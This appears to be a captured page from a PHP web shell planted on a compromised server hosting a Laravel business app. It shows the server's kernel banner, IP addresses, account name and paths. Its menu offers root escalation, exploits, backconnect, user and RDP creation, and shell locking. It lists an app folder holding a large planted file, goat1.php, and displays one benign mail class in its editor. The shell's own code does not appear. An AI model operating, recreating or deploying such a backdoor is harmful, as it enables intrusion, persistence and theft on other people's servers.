Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.16
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechhms.com /
app /
Mail /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
BillerCreate.php
681
B
-rw-rw-r--
CustomerCreate.php
691
B
-rw-rw-r--
CustomerDeposit.php
694
B
-rw-rw-r--
DeliveryChallan.php
697
B
-rw-rw-r--
DeliveryDetails.php
697
B
-rw-rw-r--
HolidayApprove.php
692
B
-rw-rw-r--
LogMessage.php
712
B
-rw-rw-r--
PaymentDetails.php
692
B
-rw-rw-r--
PayrollDetails.php
692
B
-rw-rw-r--
QuotationDetails.php
702
B
-rw-rw-r--
ReturnDetails.php
687
B
-rw-rw-r--
SaleDetails.php
677
B
-rw-rw-r--
SupplierCreate.php
621
B
-rw-rw-r--
TenantCreate.php
762
B
-rw-rw-r--
TransferDetails.php
712
B
-rw-rw-r--
UserDetails.php
681
B
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : PayrollDetails.php
<?php namespace App\Mail; use Illuminate\Bus\Queueable; use Illuminate\Contracts\Queue\ShouldQueue; use Illuminate\Mail\Mailable; use Illuminate\Queue\SerializesModels; class PayrollDetails extends Mailable { use Queueable, SerializesModels; /** * Create a new message instance. * * @return void */ public $data; public function __construct($data) { $this->data = $data; } /** * Build the message. * * @return $this */ public function build() { $payroll_data = $this->data; return $this->view('backend.mail.payroll_details',compact('payroll_data'))->subject('Payroll Details'); } }
Close